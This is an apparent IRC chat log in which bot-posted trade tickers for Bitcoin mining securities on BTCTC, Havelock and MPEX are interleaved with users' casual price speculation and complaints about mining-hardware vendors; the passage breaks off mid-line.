Aug 21 18:32:50 [BTCTC] [DMS.MINING] 4 @ 0.003349 = 0.0134 BTC [+] Aug 21 18:33:01 it may be Aug 21 18:33:04 we will see Aug 21 18:33:25 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [-] Aug 21 18:35:04 [BTCTC] [DMS.PURCHASE] 145 @ 0.02061 = 2.9885 BTC [+] Aug 21 18:36:33 [BTCTC] [NASTY-PT] 1 @ 0.003599 BTC [+] Aug 21 18:36:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.03478 = 0.0696 BTC [+] Aug 21 18:37:32 [BTCTC] [S.MPOE-PT] 3 @ 0.0008999 = 0.0027 BTC [+] Aug 21 18:37:48 [HAVELOCK] [AM100] 1 @ 0.0332 BTC [-] Aug 21 18:38:41 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [+] Aug 21 18:38:49 http://www.reddit.com/r/BitcoinMining/comments/1kswcf/my_friend_just_spent_9000_on_a_bitcoin_miner_he/ Aug 21 18:38:54 My friend just spent $9,000 on a bitcoin miner. He has little or no in depth knowledge on bitcoins, Aug 21 18:38:57 mjr_1: anything new about your btc futures? Aug 21 18:39:24 pankkake sounds like teen spirit. Aug 21 18:40:26 [BTCTC] [B.YABMC] 2 @ 0.00305 = 0.0061 BTC [+] Aug 21 18:40:36 [BTCTC] [ACTIVEMINING] 6 @ 0.00516 = 0.031 BTC [+] Aug 21 18:40:37 [BTCTC] [ACTIVEMINING] 32 @ 0.005296 = 0.1695 BTC [+] Aug 21 18:40:38 [BTCTC] [ACTIVEMINING] 100 @ 0.005297 = 0.5297 BTC [+] Aug 21 18:40:44 [BTCTC] [ACTIVEMINING] 30 @ 0.005297 = 0.1589 BTC [+] Aug 21 18:40:50 heheh Aug 21 18:41:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.03478 = 0.0696 BTC [+] Aug 21 18:41:19 why is asicminer falling? Aug 21 18:41:47 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 21 18:42:11 chinese gov closing in of friedcat Aug 21 18:42:39 no wai Aug 21 18:42:45 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [+] Aug 21 18:42:52 i heard something bithub is to blame Aug 21 18:43:01 [BTCTC] [TAT.ASICMINER] 10 @ 0.034 = 0.34 BTC [-] Aug 21 18:43:19 [BTCTC] [FIMB] 1 @ 0.01075 BTC [+] Aug 21 18:44:18 [BTCTC] [LABCOIN] 1 @ 0.002327 BTC [-] Aug 21 18:44:20 [BTCTC] [LABCOIN] 30 @ 0.002328 = 0.0698 BTC [+] Aug 21 18:44:32 [BTCTC] [TAT.ASICMINER] 24 @ 0.034 = 0.816 BTC [-] Aug 21 18:44:45 [BTCTC] [TAT.ASICMINER] 33 @ 0.034 = 1.122 BTC [-] Aug 21 18:45:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.034 = 0.102 BTC [-] Aug 21 18:45:23 [BTCTC] [LABCOIN] 1 @ 0.002335 BTC [+] Aug 21 18:45:34 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 21 18:45:36 [BTCTC] [LABCOIN] 20 @ 0.002336 = 0.0467 BTC [+] Aug 21 18:45:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.03467 = 0.3467 BTC [+] Aug 21 18:46:39 [BTCTC] [CB.IDIFF-O] 1 @ 0.00975 BTC [+] Aug 21 18:49:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.03402 = 0.3402 BTC [-] Aug 21 18:50:12 [BTCTC] [KENILWORTH] 10 @ 0.001678 = 0.0168 BTC [-] Aug 21 18:50:14 [BTCTC] [KENILWORTH] 1 @ 0.001679 BTC [+] Aug 21 18:50:15 [BTCTC] [KENILWORTH] 465 @ 0.001698 = 0.7896 BTC [+] Aug 21 18:50:15 [BTCTC] [KENILWORTH] 977 @ 0.001699 = 1.6599 BTC [+] Aug 21 18:50:23 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [+] Aug 21 18:51:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.03401 = 0.3401 BTC [-] Aug 21 18:51:39 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [+] Aug 21 18:52:02 [HAVELOCK] [AM100] 2 @ 0.033 = 0.066 BTC [-] Aug 21 18:52:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.03402 = 0.3402 BTC [+] Aug 21 18:53:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.03402 = 0.1701 BTC [+] Aug 21 18:53:58 [BTCTC] [TAT.MINIGAME] 4405 @ 0.000235 = 1.0352 BTC [-] Aug 21 18:55:15 [BTCTC] [LABCOIN] 85 @ 0.002386 = 0.2028 BTC [+] Aug 21 18:55:16 [BTCTC] [LABCOIN] 30 @ 0.002387 = 0.0716 BTC [+] Aug 21 18:55:18 [BTCTC] [LABCOIN] 3 @ 0.00239 = 0.0072 BTC [+] Aug 21 18:55:18 [BTCTC] [LABCOIN] 20 @ 0.002392 = 0.0478 BTC [+] Aug 21 18:55:36 [BTCTC] [ASICMINER-PT] 1 @ 3.481 BTC [+] Aug 21 18:55:38 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [-] Aug 21 18:56:13 [BTCTC] [TAT.ASICMINER] 25 @ 0.03403 = 0.8508 BTC [+] Aug 21 18:56:18 [HAVELOCK] [AM100] 1 @ 0.0319 BTC [-] Aug 21 18:56:26 [BTCTC] [TAT.ASICMINER] 10 @ 0.03404 = 0.3404 BTC [+] Aug 21 18:57:30 [HAVELOCK] [AM100] 1 @ 0.032 BTC [+] Aug 21 18:59:03 [BTCTC] [ASICMINER-PT] 1 @ 3.481 BTC [+] Aug 21 18:59:06 [BTCTC] [ASICMINER-PT] 1 @ 3.48 BTC [-] Aug 21 18:59:15 [BTCTC] [ASICMINER-PT] 1 @ 3.482 BTC [+] Aug 21 18:59:39 [BTCTC] [BTC-GOLD] 1 @ 0.025 BTC [+] Aug 21 19:01:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0343 BTC [+] Aug 21 19:01:26 [BTCTC] [ASICMINER-PT] 1 @ 3.483 BTC [+] Aug 21 19:01:36 dexX7 https://bitcointalk.org/index.php?topic=144319.msg1530287#msg1530287 Aug 21 19:03:12 hmm... how long will it be before labcoin drops back to ~0.0019... Aug 21 19:03:17 [BTCTC] [ASICMINER-PT] 1 @ 3.484 BTC [+] Aug 21 19:03:51 ppl trying to catch that fallin AM knife.. Aug 21 19:04:14 fact is it's time to realize the astronomical gains since 0.1 Aug 21 19:04:21 and it's going much lower imo Aug 21 19:04:48 [BTCTC] [TAT.ASICMINER] 66 @ 0.03405 = 2.2473 BTC [-] Aug 21 19:05:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005102 = 0.1531 BTC [-] Aug 21 19:05:32 [BTCTC] [ACTIVEMINING] 25 @ 0.005101 = 0.1275 BTC [-] Aug 21 19:05:34 [BTCTC] [ACTIVEMINING] 258 @ 0.0051 = 1.3158 BTC [-] Aug 21 19:06:09 [BTCTC] [BASIC-MINING] 27 @ 0.256 = 6.912 BTC [+] Aug 21 19:06:10 its going below 3.0 before end of next week Aug 21 19:06:26 [BTCTC] [ASICMINER-PT] 1 @ 3.419 BTC [-] Aug 21 19:06:27 [BTCTC] [ASICMINER-PT] 2 @ 3.418 = 6.836 BTC [-] Aug 21 19:06:29 [BTCTC] [ASICMINER-PT] 1 @ 3.417 BTC [-] Aug 21 19:06:30 [BTCTC] [ASICMINER-PT] 7 @ 3.415 = 23.905 BTC [-] Aug 21 19:06:31 [BTCTC] [ASICMINER-PT] 1 @ 3.411 BTC [-] Aug 21 19:06:32 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [-] Aug 21 19:06:33 [BTCTC] [ASICMINER-PT] 3 @ 3.408 = 10.224 BTC [-] Aug 21 19:06:35 [BTCTC] [ASICMINER-PT] 11 @ 3.401 = 37.411 BTC [-] Aug 21 19:06:37 [BTCTC] [ASICMINER-PT] 42 @ 3.4 = 142.8 BTC [-] Aug 21 19:06:41 woops :p Aug 21 19:07:50 If only people would realize that labcoin has hit its peak and this is the time to cash in on the short term gain Aug 21 19:08:32 [BTCTC] [TAT.ASICMINER] 67 @ 0.03406 = 2.282 BTC [+] Aug 21 19:08:34 [BTCTC] [TAT.ASICMINER] 67 @ 0.03405 = 2.2814 BTC [-] Aug 21 19:11:04 [BTCTC] [DMS.MINING] 5 @ 0.00339 = 0.017 BTC [+] Aug 21 19:11:07 [BTCTC] [LABCOIN] 2 @ 0.002399 = 0.0048 BTC [+] Aug 21 19:11:08 [BTCTC] [LABCOIN] 20 @ 0.0024 = 0.048 BTC [+] Aug 21 19:11:47 [BTCTC] [TAT.ASICMINER] 26 @ 0.034 = 0.884 BTC [-] Aug 21 19:12:41 [BTCTC] [DMS.MINING] 3 @ 0.00339 = 0.0102 BTC [+] Aug 21 19:15:26 [BTCTC] [ASICMINER-PT] 1 @ 3.404 BTC [+] Aug 21 19:15:28 [BTCTC] [ASICMINER-PT] 1 @ 3.403 BTC [-] Aug 21 19:15:29 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Aug 21 19:16:03 [BTCTC] [ASICMINER-PT] 1 @ 3.478 BTC [+] Aug 21 19:16:31 For this week and part of next week I don't see Labcoin going above .00255, it's at a stable point between .0022 and .00245 right now Aug 21 19:16:38 [HAVELOCK] [AM100] 3 @ 0.033 = 0.099 BTC [+] Aug 21 19:17:58 [BTCTC] [DMS.MINING] 45 @ 0.00339 = 0.1526 BTC [+] Aug 21 19:19:09 [HAVELOCK] [AM100] 5 @ 0.033 = 0.165 BTC [+] Aug 21 19:19:36 [BTCTC] [ASICMINER-PT] 1 @ 3.469 BTC [-] Aug 21 19:19:45 [MPEX] [S.MPOE] 4101 @ 0.00083164 = 3.4106 BTC [+] Aug 21 19:20:18 [HAVELOCK] [AM100] 22 @ 0.033 = 0.726 BTC [+] Aug 21 19:21:18 [BTCTC] [TAT.ASICMINER] 24 @ 0.034 = 0.816 BTC [-] Aug 21 19:22:34 [BTCTC] [KENILWORTH] 1 @ 0.001794 BTC [+] Aug 21 19:22:47 [BTCTC] [DMS.SELLING] 2 @ 0.01778 = 0.0356 BTC [+] Aug 21 19:23:36 [BTCTC] [LABCOIN] 1 @ 0.002401 BTC [+] Aug 21 19:23:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.0339 BTC [-] Aug 21 19:23:59 [BTCTC] [ASICMINER-PT] 1 @ 3.466 BTC [-] Aug 21 19:24:01 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9 BTC [-] Aug 21 19:24:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.0335 = 0.1005 BTC [-] Aug 21 19:24:26 [BTCTC] [TAT.ASICMINER] 47 @ 0.0332 = 1.5604 BTC [-] Aug 21 19:25:58 [HAVELOCK] [AM100] 1 @ 0.0331 BTC [+] Aug 21 19:29:49 [BTCTC] [LABCOIN] 30 @ 0.002399 = 0.072 BTC [-] Aug 21 19:29:51 [BTCTC] [LABCOIN] 2 @ 0.0024 = 0.0048 BTC [+] Aug 21 19:29:52 [BTCTC] [LABCOIN] 20 @ 0.002401 = 0.048 BTC [+] Aug 21 19:29:53 [BTCTC] [LABCOIN] 625 @ 0.002414 = 1.5088 BTC [+] Aug 21 19:30:35 [BTCTC] [LABCOIN] 30 @ 0.002412 = 0.0724 BTC [-] Aug 21 19:30:37 [BTCTC] [LABCOIN] 628 @ 0.002413 = 1.5154 BTC [+] Aug 21 19:32:06 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [-] Aug 21 19:34:26 [HAVELOCK] [XBOND] 5 @ 0.0011499 = 0.0057 BTC [-] Aug 21 19:34:29 [BTCTC] [ASICMINER-PT] 1 @ 3.46 BTC [+] Aug 21 19:34:38 [BTCTC] [DMS.MINING] 27 @ 0.00339 = 0.0915 BTC [+] Aug 21 19:35:31 [BTCTC] [ASICMINER-PT] 10 @ 3.4 = 34 BTC [-] Aug 21 19:36:09 [HAVELOCK] [AM100] 4 @ 0.0331 = 0.1324 BTC [+] Aug 21 19:37:05 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 21 19:37:07 [BTCTC] [ASICMINER-PT] 2 @ 3.4 = 6.8 BTC [-] Aug 21 19:37:09 [BTCTC] [ASICMINER-PT] 1 @ 3.37 BTC [-] Aug 21 19:37:26 [BTCTC] [LABCOIN] 6 @ 0.002412 = 0.0145 BTC [-] Aug 21 19:37:27 [BTCTC] [LABCOIN] 802 @ 0.002413 = 1.9352 BTC [+] Aug 21 19:37:27 [BTCTC] [LABCOIN] 1756 @ 0.002414 = 4.239 BTC [+] Aug 21 19:43:50 [BTCTC] [LABCOIN] 1 @ 0.002411 BTC [-] Aug 21 19:45:05 https://forums.butterflylabs.com/monarch-discussion/4420-what-monarch-group-order.html#post53319 Aug 21 19:45:07 What is a monarch "group order" Aug 21 19:46:06 [BTCTC] [DMS.PURCHASE] 8 @ 0.02061 = 0.1649 BTC [+] Aug 21 19:46:44 [BTCTC] [ASICMINER-PT] 1 @ 3.351 BTC [-] Aug 21 19:48:37 [BTCTC] [ASICMINER-PT] 1 @ 3.35 BTC [-] Aug 21 19:49:23 [BTCTC] [DMS.SELLING] 200 @ 0.01748 = 3.496 BTC [-] Aug 21 19:49:26 [BTCTC] [HOSTED-MINING] 3 @ 0.2703 = 0.8109 BTC [-] Aug 21 19:49:28 [BTCTC] [HOSTED-MINING] 27 @ 0.2702 = 7.2954 BTC [-] Aug 21 19:49:30 [BTCTC] [LABCOIN] 5 @ 0.002412 = 0.0121 BTC [+] Aug 21 19:49:31 [BTCTC] [HOSTED-MINING] 7 @ 0.2701 = 1.8907 BTC [-] Aug 21 19:49:33 [BTCTC] [HOSTED-MINING] 2 @ 0.2701 = 0.5402 BTC [-] Aug 21 19:49:34 [BTCTC] [HOSTED-MINING] 1 @ 0.27 BTC [-] Aug 21 19:49:35 [BTCTC] [HOSTED-MINING] 38 @ 0.27 = 10.26 BTC [-] Aug 21 19:49:57 bfl makes me sick to my stomach Aug 21 19:50:06 dont over post them Aug 21 19:50:20 ^ Aug 21 19:50:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001484 BTC [+] Aug 21 19:50:43 [BTCTC] [LABCOIN] 30 @ 0.002378 = 0.0713 BTC [-] Aug 21 19:50:45 [BTCTC] [LABCOIN] 20 @ 0.002377 = 0.0475 BTC [-] Aug 21 19:51:07 lol group order. Aug 21 19:51:12 [BTCTC] [ASICMINER-PT] 1 @ 3.348 BTC [-] Aug 21 19:51:17 [BTCTC] [LABCOIN] 85 @ 0.00237 = 0.2015 BTC [-] Aug 21 19:51:19 [BTCTC] [LABCOIN] 30 @ 0.00237 = 0.0711 BTC [-] Aug 21 19:51:34 the bitcoin foundation scammers are nao going to find some sucker to collect bitcoin from people and hand it over, thus insulating them ? Aug 21 19:51:36 nice plan. Aug 21 19:52:15 what's to read is "If you order now, I would not expect you to take delivery of your unit until sometime in February" Aug 21 19:52:32 2015. Aug 21 19:52:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.03325 = 0.2328 BTC [+] Aug 21 19:52:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00148 BTC [-] Aug 21 19:52:53 [BTCTC] [LABCOIN] 30 @ 0.00237 = 0.0711 BTC [-] Aug 21 19:53:11 [BTCTC] [LABCOIN] 30 @ 0.00237 = 0.0711 BTC [-] Aug 21 19:53:26 [BTCTC] [LABCOIN] 4 @ 0.00237 = 0.0095 BTC [-] Aug 21 19:53:47 [BTCTC] [LABCOIN] 4 @ 0.00237 = 0.0095 BTC [-] Aug 21 19:54:04 [BTCTC] [LABCOIN] 11 @ 0.002371 = 0.0261 BTC [+] Aug 21 19:54:22 [BTCTC] [LABCOIN] 4 @ 0.002369 = 0.0095 BTC [-] Aug 21 19:54:32 [BTCTC] [TAT.ASICMINER] 67 @ 0.03324 = 2.2271 BTC [-] Aug 21 19:54:33 [BTCTC] [LABCOIN] 6 @ 0.00237 = 0.0142 BTC [+] Aug 21 19:54:35 [HAVELOCK] [AM1] 1 @ 3.2501 BTC [+] Aug 21 19:54:37 [BTCTC] [LABCOIN] 7 @ 0.002329 = 0.0163 BTC [-] Aug 21 19:54:39 [BTCTC] [LABCOIN] 59 @ 0.002328 = 0.1374 BTC [-] Aug 21 19:54:40 [BTCTC] [LABCOIN] 387 @ 0.002279 = 0.882 BTC [-] Aug 21 19:54:41 [BTCTC] [LABCOIN] 135 @ 0.002278 = 0.3075 BTC [-] Aug 21 19:55:24 [BTCTC] [ASICMINER-PT] 15 @ 3.33 = 49.95 BTC [-] Aug 21 19:55:25 [BTCTC] [ASICMINER-PT] 3 @ 3.201 = 9.603 BTC [-] Aug 21 19:55:26 [BTCTC] [ASICMINER-PT] 3 @ 3.2 = 9.6 BTC [-] Aug 21 19:55:27 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Aug 21 19:55:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001351 BTC [-] Aug 21 19:57:23 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.001351 = 0.0122 BTC [-] Aug 21 19:58:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.0332 = 0.4316 BTC [-] Aug 21 19:58:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.03318 = 0.3318 BTC [-] Aug 21 19:58:40 [BTCTC] [TAT.ASICMINER] 28 @ 0.03299 = 0.9237 BTC [-] Aug 21 19:59:51 [BTCTC] [ASICMINER-PT] 1 @ 3.199 BTC [-] Aug 21 19:59:52 [BTCTC] [ASICMINER-PT] 8 @ 3.198 = 25.584 BTC [-] Aug 21 20:00:11 [HAVELOCK] [LABCO] 5 @ 0.00226 = 0.0113 BTC [-] Aug 21 20:02:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.03323 BTC [+] Aug 21 20:03:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.03322 = 0.1661 BTC [-] Aug 21 20:03:31 [BTCTC] [LABCOIN] 30 @ 0.002334 = 0.07 BTC [+] Aug 21 20:04:26 [BTCTC] [LABCOIN] 3 @ 0.002331 = 0.007 BTC [-] Aug 21 20:04:27 [BTCTC] [LABCOIN] 30 @ 0.002331 = 0.0699 BTC [-] Aug 21 20:04:58 [BTCTC] [LABCOIN] 30 @ 0.002329 = 0.0699 BTC [-] Aug 21 20:04:59 [BTCTC] [LABCOIN] 25 @ 0.00233 = 0.0583 BTC [+] Aug 21 20:05:05 [HAVELOCK] [XBOND] 1 @ 0.001145 BTC [-] Aug 21 20:06:10 [BTCTC] [LABCOIN] 1 @ 0.002345 BTC [+] Aug 21 20:06:46 [BTCTC] [LABCOIN] 20 @ 0.002346 = 0.0469 BTC [+] Aug 21 20:07:22 [BTCTC] [LABCOIN] 30 @ 0.002406 = 0.0722 BTC [+] Aug 21 20:08:37 [BTCTC] [LABCOIN] 7 @ 0.002405 = 0.0168 BTC [-] Aug 21 20:08:37 [BTCTC] [LABCOIN] 23 @ 0.002405 = 0.0553 BTC [-] Aug 21 20:09:28 [BTCTC] [LABCOIN] 29 @ 0.002402 = 0.0697 BTC [-] Aug 21 20:10:55 [BTCTC] [ASICMINER-PT] 1 @ 3.101 BTC [-] Aug 21 20:10:56 [BTCTC] [ASICMINER-PT] 3 @ 3.1 = 9.3 BTC [-] Aug 21 20:10:58 [BTCTC] [ASICMINER-PT] 1 @ 3.08 BTC [-] Aug 21 20:10:59 [BTCTC] [ASICMINER-PT] 4 @ 3.03 = 12.12 BTC [-] Aug 21 20:11:00 [BTCTC] [ASICMINER-PT] 1 @ 3.026 BTC [-] Aug 21 20:11:01 [BTCTC] [ASICMINER-PT] 1 @ 3.023 BTC [-] Aug 21 20:11:02 [BTCTC] [ASICMINER-PT] 1 @ 3.023 BTC [-] Aug 21 20:11:04 [BTCTC] [ASICMINER-PT] 6 @ 3.022 = 18.132 BTC [-] Aug 21 20:12:40 asicminers price has changed dramaticly the past few weeks wow Aug 21 20:12:48 wasnt it at 4btc just a few weeks ago? Aug 21 20:13:25 5btc a month ago Aug 21 20:15:32 its not gonna hold 3. Aug 21 20:16:18 [BTCTC] [ASICMINER-PT] 1 @ 3.052 BTC [+] Aug 21 20:16:18 return from 0.1 to 5 = 4900.00% Aug 21 20:16:19 [BTCTC] [ASICMINER-PT] 2 @ 3.05 = 6.1 BTC [-] Aug 21 20:16:19 [BTCTC] [ASICMINER-PT] 8 @ 3.05 = 24.4 BTC [-] Aug 21 20:16:20 [BTCTC] [ASICMINER-PT] 4 @ 3.022 = 12.088 BTC [-] Aug 21 20:16:21 [BTCTC] [ASICMINER-PT] 2 @ 3.02 = 6.04 BTC [-] Aug 21 20:16:23 [BTCTC] [ASICMINER-PT] 2 @ 3.012 = 6.024 BTC [-] Aug 21 20:16:24 [BTCTC] [ASICMINER-PT] 1 @ 3.011 BTC [-] Aug 21 20:16:25 [BTCTC] [ASICMINER-PT] 3 @ 3.011 = 9.033 BTC [-] Aug 21 20:16:26 [BTCTC] [ASICMINER-PT] 25 @ 3.01 = 75.25 BTC [-] Aug 21 20:16:33 time to take profit and look for new adventures Aug 21 20:17:10 [BTCTC] [ASICMINER-PT] 2 @ 3.59 = 7.18 BTC [+] Aug 21 20:17:22 [BTCTC] [ASICMINER-PT] 1 @ 3.011 BTC [-] Aug 21 20:17:23 [BTCTC] [ASICMINER-PT] 5 @ 3.01 = 15.05 BTC [-] Aug 21 20:17:24 [BTCTC] [ASICMINER-PT] 3 @ 3.001 = 9.003 BTC [-] Aug 21 20:17:25 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 20:17:26 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 20:17:35 and ppl buying at 3.6 when bid is 3 :p Aug 21 20:17:43 [BTCTC] [TAT.ASICMINER] 32 @ 0.03118 = 0.9978 BTC [-] Aug 21 20:18:10 did the div get announced yet? Aug 21 20:18:30 [BTCTC] [ASICMINER-PT] 2 @ 3.02 = 6.04 BTC [+] Aug 21 20:18:51 .d Aug 21 20:18:51 50810339.04828 | Next Diff in 584 blocks | Estimated Change: 25.0415% in 3d 0h 39m 59s Aug 21 20:18:55 [BTCTC] [ASICMINER-PT] 2 @ 3.59 = 7.18 BTC [+] Aug 21 20:19:43 huge spread Aug 21 20:19:52 !last btctc dms.selling Aug 21 20:19:53 Last trade for DMS.SELLING on BTCTC was at 0.01748 BTC [-] Aug 21 20:20:18 time to remove those ask orders on actm :p Aug 21 20:20:26 Hollywood it was like 12 or so Aug 21 20:20:34 all this AM money is gonna go somewhere :p Aug 21 20:21:02 pmbs are holding strong despite 25% Aug 21 20:21:49 Doubt it'll be ActM that gets it Aug 21 20:22:04 ActM hasn't seen a true raise in some time now Aug 21 20:22:16 at least not until they get some real "news" Aug 21 20:22:16 gecko_x2 problem so far seems to be it's really not so very much money. Aug 21 20:22:30 i'd be surprised if the trip from 3.x to 1.x nets a grand total of 2k btc. Aug 21 20:22:40 mmm true Aug 21 20:22:47 [BTCTC] [DMS.MINING] 10 @ 0.00339 = 0.0339 BTC [+] Aug 21 20:23:06 which kind of makes it a contest of who gets it first really. Aug 21 20:23:27 2k in any stock can be a game changer or at least enough to spur up other investors Aug 21 20:26:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 21 20:26:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 21 20:28:59 the real question that matters for the future is rolled vs. unrolled. Aug 21 20:29:14 and my money is on 1 hash per cycle, ie unrolled Aug 21 20:29:32 [BTCTC] [BASIC-MINING] 1 @ 0.255 BTC [-] Aug 21 20:29:33 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [-] Aug 21 20:29:35 [BTCTC] [BASIC-MINING] 2 @ 0.25 = 0.5 BTC [-] Aug 21 20:29:36 [BTCTC] [BASIC-MINING] 1 @ 0.249 BTC [-] Aug 21 20:29:36 [BTCTC] [BASIC-MINING] 1 @ 0.2403 BTC [-] Aug 21 20:29:37 [BTCTC] [BASIC-MINING] 30 @ 0.2312 = 6.936 BTC [-] Aug 21 20:29:38 [BTCTC] [BASIC-MINING] 1 @ 0.2311 BTC [-] Aug 21 20:29:40 [BTCTC] [BASIC-MINING] 4 @ 0.2311 = 0.9244 BTC [-] Aug 21 20:29:41 [BTCTC] [BASIC-MINING] 10 @ 0.2303 = 2.303 BTC [-] Aug 21 20:29:42 [BTCTC] [BASIC-MINING] 20 @ 0.23 = 4.6 BTC [-] Aug 21 20:29:43 [BTCTC] [BASIC-MINING] 1 @ 0.23 BTC [-] Aug 21 20:29:44 [BTCTC] [BASIC-MINING] 2 @ 0.2279 = 0.4558 BTC [-] Aug 21 20:29:45 [BTCTC] [BASIC-MINING] 1 @ 0.2279 BTC [-] Aug 21 20:29:46 [BTCTC] [BASIC-MINING] 24 @ 0.223 = 5.352 BTC [-] Aug 21 20:29:46 [BTCTC] [BASIC-MINING] 5 @ 0.22 = 1.1 BTC [-] Aug 21 20:29:47 [BTCTC] [BASIC-MINING] 100 @ 0.22 = 22 BTC [-] Aug 21 20:30:02 [BTCTC] [LABCOIN] 6 @ 0.002396 = 0.0144 BTC [-] Aug 21 20:30:04 [BTCTC] [LABCOIN] 30 @ 0.002397 = 0.0719 BTC [+] Aug 21 20:31:33 [BTCTC] [LABCOIN] 124 @ 0.002397 = 0.2972 BTC [+] Aug 21 20:31:53 [HAVELOCK] [AM100] 12 @ 0.031 = 0.372 BTC [-] Aug 21 20:32:25 [BTCTC] [ASICMINER-PT] 1 @ 3.189 BTC [-] Aug 21 20:32:26 [BTCTC] [ASICMINER-PT] 1 @ 3.19 BTC [+] Aug 21 20:32:28 [BTCTC] [ASICMINER-PT] 1 @ 3.199 BTC [+] Aug 21 20:33:03 [HAVELOCK] [AM1] 1 @ 3 BTC [-] Aug 21 20:33:54 [BTCTC] [ASICMINER-PT] 1 @ 3.59 BTC [+] Aug 21 20:33:56 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 20:34:36 [BTCTC] [ASICMINER-PT] 1 @ 2.901 BTC [-] Aug 21 20:34:38 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [-] Aug 21 20:35:12 [HAVELOCK] [AM100] 1 @ 0.02999 BTC [-] Aug 21 20:36:10 [BTCTC] [TAT.ASICMINER] 7 @ 0.03299 = 0.2309 BTC [+] Aug 21 20:36:32 [MPEX] [S.MPOE] 9599 @ 0.00083164 = 7.9829 BTC [+] Aug 21 20:36:33 [MPEX] [S.MPOE] 3401 @ 0.00082936 = 2.8207 BTC [-] Aug 21 20:37:04 [HAVELOCK] [LABCO] 1 @ 0.00222222 BTC [-] Aug 21 20:37:12 [HAVELOCK] [LABCO] 15 @ 0.0021 = 0.0315 BTC [-] Aug 21 20:37:19 [HAVELOCK] [LABCO] 2 @ 0.002 = 0.004 BTC [-] Aug 21 20:40:06 [HAVELOCK] [AM100] 1 @ 0.0329 BTC [+] Aug 21 20:40:48 [BTCTC] [ASICMINER-PT] 2 @ 3.59 = 7.18 BTC [+] Aug 21 20:41:05 [BTCTC] [BASIC-MINING] 1 @ 0.22 BTC [-] Aug 21 20:41:06 [BTCTC] [BASIC-MINING] 110 @ 0.2127 = 23.397 BTC [-] Aug 21 20:41:07 [BTCTC] [BASIC-MINING] 40 @ 0.2126 = 8.504 BTC [-] Aug 21 20:41:08 [BTCTC] [BASIC-MINING] 6 @ 0.2125 = 1.275 BTC [-] Aug 21 20:41:12 hmmmmm Aug 21 20:41:19 [HAVELOCK] [AM100] 1 @ 0.0329 BTC [+] Aug 21 20:41:19 basic is always tempting Aug 21 20:44:43 [BTCTC] [BASIC-MINING] 27 @ 0.2125 = 5.7375 BTC [-] Aug 21 20:49:19 mircea_popescu> Hollywood it was like 12 or so < thank you mircea Aug 21 20:49:29 [BTCTC] [ASICMINER-PT] 1 @ 3.138 BTC [-] Aug 21 20:53:54 [BTCTC] [DMS.MINING] 39 @ 0.003389 = 0.1322 BTC [-] Aug 21 20:54:03 [BTCTC] [ASICMINER-PT] 1 @ 3.034 BTC [-] Aug 21 20:54:21 [BTCTC] [DMS.MINING] 110 @ 0.00339 = 0.3729 BTC [+] Aug 21 20:54:45 [BTCTC] [DMS.MINING] 400 @ 0.003395 = 1.358 BTC [+] Aug 21 20:55:14 [BTCTC] [ASICMINER-PT] 1 @ 3.033 BTC [-] Aug 21 20:55:16 [BTCTC] [ASICMINER-PT] 2 @ 3.032 = 6.064 BTC [-] Aug 21 20:55:17 [BTCTC] [ASICMINER-PT] 1 @ 3.031 BTC [-] Aug 21 20:55:53 [BTCTC] [DMS.MINING] 100 @ 0.0034 = 0.34 BTC [+] Aug 21 20:55:55 [BTCTC] [DMS.MINING] 73 @ 0.0034 = 0.2482 BTC [+] Aug 21 20:55:57 [BTCTC] [TAT.ASICMINER] 11 @ 0.03157 = 0.3473 BTC [-] Aug 21 20:56:15 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 21 20:56:23 [BTCTC] [ASICMINER-PT] 2 @ 3.03 = 6.06 BTC [-] Aug 21 20:58:38 [MPEX] [S.MPOE] 5300 @ 0.00082936 = 4.3956 BTC [-] Aug 21 20:58:42 [BTCTC] [ASICMINER-PT] 3 @ 3.03 = 9.09 BTC [-] Aug 21 20:58:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.03161 = 0.2529 BTC [+] Aug 21 20:58:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0316 BTC [-] Aug 21 20:58:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.03151 = 0.3151 BTC [-] Aug 21 20:58:55 [BTCTC] [TAT.ASICMINER] 